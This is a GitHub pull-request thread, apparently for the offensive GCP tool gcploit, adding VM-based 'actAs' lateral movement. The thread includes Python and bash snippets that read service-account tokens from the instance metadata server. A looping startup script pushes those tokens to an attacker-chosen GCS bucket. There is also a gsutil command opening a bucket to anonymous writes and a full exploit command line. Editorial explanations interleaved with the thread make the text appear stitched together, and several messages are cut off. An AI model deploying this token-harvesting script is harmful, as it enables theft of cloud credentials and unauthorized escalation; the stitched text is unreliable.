Support actAs with VMs in addition to GCF #10
4ndygu wants to merge 10 commits into dxa4481:master from
Conversation
Hmmm, the bucket seems a little tricky in some cases. Would it make more sense to just have the startup script run a simple Python server on port 80 that returns data with a supplied password?
Hmm, I thought about the port 80 situation, but it may be difficult to reach that server without a corresponding firewall rule change. I recognize that default ports may allow ingress on the default network, but it would be difficult to guarantee token access without a corresponding guarantee that the firewall ports are open. Pushing routinely to GCS lets us take advantage of GCP hosts typically having lax egress requirements, especially when it comes to storage services in GCP and GCP IPs. Although I might be mistaken here -- how do you feel?
What if the data were brokered through the compute metadata? That should be available, and if you could land a startup script you should have permissions to it already.
Oh, I guess not all the instances will have permission to the metadata, though.
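The metadata-broker idea above hinges on reaching the instance token endpoint. A minimal sketch of that fetch, assuming the stock GCE metadata server layout (this only works from inside a GCE VM, and only if the instance has an attached service account):

```python
import json
import urllib.request

# Default token endpoint for the VM's attached service account.
METADATA_TOKEN_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)

def build_token_request() -> urllib.request.Request:
    # The metadata server rejects any request lacking this header.
    return urllib.request.Request(
        METADATA_TOKEN_URL, headers={"Metadata-Flavor": "Google"}
    )

def fetch_access_token() -> str:
    # Raises URLError when run off-GCE; callers should handle that case.
    with urllib.request.urlopen(build_token_request(), timeout=5) as resp:
        return json.loads(resp.read())["access_token"]
```

As the thread notes, if the metadata server is unreachable (or the instance has no attached service account), there is nothing to broker.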
Hrm... the only thing with the bucket is there's an action the user has to take to explicitly add the service account to it. Maybe a big message when you run the module: "MAKE SURE YOU GIVE
I think that if compute metadata were unavailable, the entire vector would be dead in the water :(. That being said, since this vector relies on the creation of new VMs, my assumption is that technically, we do have it. In any case, this PR edits the flags to ask users to manually supply their own bucket. I'll add a commit to let users know they have to give the SA access to the bucket :).
A quick note -- I would imagine that if I were a user, I would just make the bucket publicly writable but not readable, i.e. granting Storage Object Creator to allUsers. How do you feel?
[pushed my conception of that up.]
Because the user has full control over the bucket, they should always be able to add the service account to it, no? No reason not to lock it down, right?
Right. I was appealing to the scenario where someone may see a project with a large number of different service accounts, which would in turn have projects with large numbers of different service accounts. It may get unwieldy to manage all those credentials first, then load permissions accordingly. The additional risk profile is write-only, not read, so I suppose a malicious user could overwrite existing keys, but not extend access by reading new objects in that GCS bucket. In any case, I abstracted the command with
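For reference, the write-only bucket discussed above could be granted with a single gsutil command; the bucket name here is a placeholder:

```shell
# Grant object-create (write) but not read/list to everyone: tokens can be
# pushed into the bucket, but its contents cannot be read anonymously.
gsutil iam ch allUsers:roles/storage.objectCreator gs://YOUR_BUCKET
```

This matches the risk profile described in the thread: anonymous principals could overwrite objects, but not read them back out.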
Hi! I went ahead and also added support for escalation if users have the
Ahh, nice. Another question: I notice the bucket currently needs to be hard-coded into the source and modified by the user, but this workflow is difficult, particularly for folks who want to pull the image from Docker Hub. Can we move this bucket to be configurable by command-line argument?
Cool -- I think that currently, the script replaces the bucket name with I see your point, though -- at least in the I'm messing with a way to attach arbitrary Python packages to a Dataflow job to replicate this script, and I'll take a shot at doing the replace if I'm understanding your message :).
For more clarity -- the function doing the dynamic replace is
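The dynamic replace being discussed could look something like the sketch below. The `{{BUCKET}}` placeholder, the template body, and the function name are assumptions for illustration, not the PR's actual code:

```python
# Hypothetical startup-script template: loop forever, pull a token from the
# metadata server, and push it to the user-supplied GCS bucket.
STARTUP_TEMPLATE = """#!/bin/bash
while true; do
  curl -s -H 'Metadata-Flavor: Google' \\
    'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' \\
    | gsutil cp - "gs://{{BUCKET}}/token-$(hostname)-$(date +%s).json"
  sleep 600
done
"""

def render_startup_script(bucket: str) -> str:
    # Substitute the user's bucket before attaching the script to the VM.
    if "{{BUCKET}}" not in STARTUP_TEMPLATE:
        raise ValueError("template is missing the bucket placeholder")
    return STARTUP_TEMPLATE.replace("{{BUCKET}}", bucket)
```

This keeps the bucket out of the source entirely, so a user pulling the image from Docker Hub can pass it at run time.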
Hi @dxa4481! Just wanted to check in on this. I edited the above functionality while working on another lateral feature, and can send that as soon as I figure some stuff out with Dataflow.
Just got around to testing. I was able to use the VM source, but when I go to actually use the SA for commands, I'm getting this error when it tries to fetch a credential: Any idea what's causing this? Also, unrelated: would you mind removing the pyc file that was committed? Sorry if responses are a little delayed -- I'm in the middle of a move, so things are a little crazy.
No worries, good luck on the move! I'll hit these after work today.
I did provide the bucket name, and both the base identity and the target identity had project editor on the bucket, all of which lived in the same project in which I was provisioning the VM.
Killed the pyc. Re: the bucket issue, I just confirmed that I was able to run with the following command: I have a hunch that this might be due to an assumption the In any case, I'll work on seeding the project with a user-supplied name.
I added a configuration to specify the GCS client project. Please lmk if this helps with your issue!
So here's the output of the command after pulling the latest: I do have access to that bucket, though, as verified by:
Hmm, I replicated your setup and have been unable to reproduce the same behavior. To drill down a little bit more, did you seed your account with Additionally, if you literally run Sorry for the back and forth!
I have the correct service account activated: and I confirmed I can write to the bucket: I'll do a little more testing later today.
Hmm, I still have not been able to reproduce this situation. Can you give me some of your output from
This PR supports lateral movement for users with Service Account User + Compute User. The tactic here is to mount compute instances with startup scripts that recurrently pull from the token endpoints and push them to a user's chosen GCS bucket. Identities must have access to the bucket. I add the following flags:
actAsMethod -- defaults to cloud function, but can support VM-based lateral movement
bucket -- stores startup-script information for the service account at hand
I can call with:
python3 main.py --exploit actas --actAsMethod vm --bucket gcploit_eater --project speedy-cab-288518 --target all
The PR also includes some name changes to support extensibility. Please let me know if other solutions work better!
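The flag surface above could be parsed with something like the following sketch; the accepted choices and defaults are assumptions inferred from this thread, not the PR's exact code:

```python
import argparse

def build_parser() -> argparse.ArgumentParser:
    p = argparse.ArgumentParser(prog="main.py")
    p.add_argument("--exploit", required=True)
    # Defaults to the cloud-function path; "vm" enables the new vector.
    p.add_argument("--actAsMethod", choices=["cloudfunction", "vm"],
                   default="cloudfunction")
    p.add_argument("--bucket",
                   help="GCS bucket the startup script pushes tokens to")
    p.add_argument("--project")
    p.add_argument("--target")
    return p

args = build_parser().parse_args(
    ["--exploit", "actas", "--actAsMethod", "vm",
     "--bucket", "gcploit_eater",
     "--project", "speedy-cab-288518", "--target", "all"]
)
```

Making `--bucket` a plain argument (rather than a hard-coded constant) is what allows the Docker Hub workflow discussed earlier in the thread.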
There are a few wishlist items:
--impersonate-service-account.